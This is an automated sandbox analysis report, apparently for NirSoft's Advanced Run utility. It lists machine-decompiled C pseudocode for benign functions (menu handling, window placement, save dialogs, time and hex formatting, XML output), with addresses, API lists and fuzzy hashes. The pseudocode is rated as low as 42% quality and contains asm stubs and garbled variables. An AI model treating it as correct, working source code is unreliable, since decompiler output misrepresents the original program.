                                                                                                                    0x00407699
                                                                                                                    0x00407699
                                                                                                                    0x0040769c
                                                                                                                    0x0040769f
                                                                                                                    0x004076a3
                                                                                                                    0x004076a7
                                                                                                                    0x004076ab
                                                                                                                    0x004076b5
                                                                                                                    0x004076be
                                                                                                                    0x004076c8
                                                                                                                    0x004076de
                                                                                                                    0x004076ee
                                                                                                                    0x004076f1
                                                                                                                    0x004076f4
                                                                                                                    0x004076fa
                                                                                                                    0x00407708
                                                                                                                    0x0040770e
                                                                                                                    0x00407718
                                                                                                                    0x0040771d
                                                                                                                    0x00407723
                                                                                                                    0x00407724
                                                                                                                    0x00407727
                                                                                                                    0x0040772c
                                                                                                                    0x0040772f
                                                                                                                    0x00407734
                                                                                                                    0x0040773f
                                                                                                                    0x00407744
                                                                                                                    0x00407745
                                                                                                                    0x0040767d
                                                                                                                    0x00407760

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                    • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                    • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                    • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                    • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 42%
                                                                                                                    			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                    0x0040605e
                                                                                                                    0x00406061
                                                                                                                    0x00406069
                                                                                                                    0x00406074
                                                                                                                    0x0040607a
                                                                                                                    0x0040607e
                                                                                                                    0x00406082
                                                                                                                    0x00406148
                                                                                                                    0x0040614e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406088
                                                                                                                    0x00406088
                                                                                                                    0x00406093
                                                                                                                    0x00406098
                                                                                                                    0x0040609f
                                                                                                                    0x004060ae
                                                                                                                    0x004060b6
                                                                                                                    0x004060be
                                                                                                                    0x004060c6
                                                                                                                    0x004060ca
                                                                                                                    0x004060cf
                                                                                                                    0x004060d7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060de
                                                                                                                    0x00406129
                                                                                                                    0x00406129
                                                                                                                    0x0040612d
                                                                                                                    0x0040612f
                                                                                                                    0x00406130
                                                                                                                    0x00406134
                                                                                                                    0x00406137
                                                                                                                    0x0040613c
                                                                                                                    0x0040613c
                                                                                                                    0x00000000
                                                                                                                    0x0040612d
                                                                                                                    0x004060e7
                                                                                                                    0x004060f0
                                                                                                                    0x004060f2
                                                                                                                    0x004060f2
                                                                                                                    0x004060f9
                                                                                                                    0x004060fd
                                                                                                                    0x00406102
                                                                                                                    0x0040610c
                                                                                                                    0x00406112
                                                                                                                    0x00406117
                                                                                                                    0x00406117
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406102
                                                                                                                    0x00406122
                                                                                                                    0x00406128
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x0040613f
                                                                                                                    0x00406140
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                    • String ID: 0$6
                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                    • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                    • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                    • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                    • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                    0x00402bee
                                                                                                                    0x00402bf8
                                                                                                                    0x00402cae
                                                                                                                    0x00402c08
                                                                                                                    0x00402c10
                                                                                                                    0x00402c11
                                                                                                                    0x00402c12
                                                                                                                    0x00402c13
                                                                                                                    0x00402c20
                                                                                                                    0x00402c27
                                                                                                                    0x00402c2e
                                                                                                                    0x00402c30
                                                                                                                    0x00402c37
                                                                                                                    0x00402c4b
                                                                                                                    0x00402c50
                                                                                                                    0x00402c53
                                                                                                                    0x00402c55
                                                                                                                    0x00402c3e
                                                                                                                    0x00402c3e
                                                                                                                    0x00402c41
                                                                                                                    0x00402c41
                                                                                                                    0x00402c5a
                                                                                                                    0x00402c60
                                                                                                                    0x00402c65
                                                                                                                    0x00402c68
                                                                                                                    0x00402c6d
                                                                                                                    0x00402c77
                                                                                                                    0x00402c7c
                                                                                                                    0x00402c7e
                                                                                                                    0x00402c87
                                                                                                                    0x00402ca5
                                                                                                                    0x00402ca5
                                                                                                                    0x00402c87
                                                                                                                    0x00402c7c
                                                                                                                    0x00402c6d
                                                                                                                    0x00000000
                                                                                                                    0x00402cac

                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$Window
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1155976603-0
                                                                                                                    • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                    • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                    • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                    • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                    0x004036ef
                                                                                                                    0x004036f6
                                                                                                                    0x0040370b
                                                                                                                    0x00403712
                                                                                                                    0x00403717
                                                                                                                    0x0040371c
                                                                                                                    0x0040371f
                                                                                                                    0x0040372c
                                                                                                                    0x00403735
                                                                                                                    0x00403738
                                                                                                                    0x00403744
                                                                                                                    0x00403751
                                                                                                                    0x00403758
                                                                                                                    0x00403760
                                                                                                                    0x00403769
                                                                                                                    0x0040376c
                                                                                                                    0x00403778
                                                                                                                    0x0040377b
                                                                                                                    0x0040378b
                                                                                                                    0x00403792
                                                                                                                    0x00403795
                                                                                                                    0x00403798
                                                                                                                    0x0040379b
                                                                                                                    0x004037a2
                                                                                                                    0x004037a5
                                                                                                                    0x004037a8
                                                                                                                    0x004037af
                                                                                                                    0x004037b7
                                                                                                                    0x004037c3
                                                                                                                    0x00000000
                                                                                                                    0x004037d4
                                                                                                                    0x004037dc

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004036F6
                                                                                                                    • memset.MSVCRT ref: 00403712
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                      • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                      • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                      • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                      • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                      • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                      • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                    • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                    • wcscpy.MSVCRT ref: 004037C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                    • String ID: L$cfg
                                                                                                                    • API String ID: 275899518-3734058911
                                                                                                                    • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                    • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                    • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                    • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                    0x00404ed0
                                                                                                                    0x00404edf
                                                                                                                    0x00404ef6
                                                                                                                    0x00000000
                                                                                                                    0x00404f00
                                                                                                                    0x00404f1c
                                                                                                                    0x00404f31
                                                                                                                    0x00404f41
                                                                                                                    0x00404f4e
                                                                                                                    0x00404f5d
                                                                                                                    0x00404f66
                                                                                                                    0x00404f69
                                                                                                                    0x00404f69
                                                                                                                    0x00404f71
                                                                                                                    0x00404f77
                                                                                                                    0x00404f7d

                                                                                                                    APIs
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                    • wcscpy.MSVCRT ref: 00404F41
                                                                                                                    • wcscat.MSVCRT ref: 00404F4E
                                                                                                                    • wcscat.MSVCRT ref: 00404F5D
                                                                                                                    • wcscpy.MSVCRT ref: 00404F71
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1331804452-0
                                                                                                                    • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                    • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                    • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                    • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                    0x00404fe0
                                                                                                                    0x00404fe9
                                                                                                                    0x00405000
                                                                                                                    0x00405005
                                                                                                                    0x00405009
                                                                                                                    0x0040500c
                                                                                                                    0x0040500e
                                                                                                                    0x00405015
                                                                                                                    0x00405016
                                                                                                                    0x00405021
                                                                                                                    0x00405026
                                                                                                                    0x00405027
                                                                                                                    0x0040502c
                                                                                                                    0x00405031
                                                                                                                    0x00405039
                                                                                                                    0x0040503f
                                                                                                                    0x00405044
                                                                                                                    0x00405048
                                                                                                                    0x0040504e
                                                                                                                    0x00405056
                                                                                                                    0x0040505c
                                                                                                                    0x0040504e
                                                                                                                    0x00405065
                                                                                                                    0x0040506a
                                                                                                                    0x00405072
                                                                                                                    0x00405079

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                    • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                    • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                    • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                    • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 42%
                                                                                                                    			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                    0x00407d9c
                                                                                                                    0x00407d9e
                                                                                                                    0x00407da5
                                                                                                                    0x00407db3
                                                                                                                    0x00407dba
                                                                                                                    0x00407dc5
                                                                                                                    0x00407dc7
                                                                                                                    0x00407dd0
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dd8
                                                                                                                    0x00407de1
                                                                                                                    0x00407de5
                                                                                                                    0x00407deb
                                                                                                                    0x00407df2
                                                                                                                    0x00407df3
                                                                                                                    0x00407dfe
                                                                                                                    0x00407e03
                                                                                                                    0x00407e04
                                                                                                                    0x00407e21

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                    • <%s>, xrefs: 00407DF3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                    • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                    • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                    • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                    • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                    0x00403b56
                                                                                                                    0x00403b5d
                                                                                                                    0x00403b6f
                                                                                                                    0x00403b76
                                                                                                                    0x00403b82
                                                                                                                    0x00403b8d
                                                                                                                    0x00403b8e
                                                                                                                    0x00403b99
                                                                                                                    0x00403b9e
                                                                                                                    0x00403b9f
                                                                                                                    0x00403ba7
                                                                                                                    0x00403bb9
                                                                                                                    0x00403bce
                                                                                                                    0x00403be5
                                                                                                                    0x00403bef
                                                                                                                    0x00403bf8
                                                                                                                    0x00403c00

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403B5D
                                                                                                                    • memset.MSVCRT ref: 00403B76
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                      • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                      • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                      • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
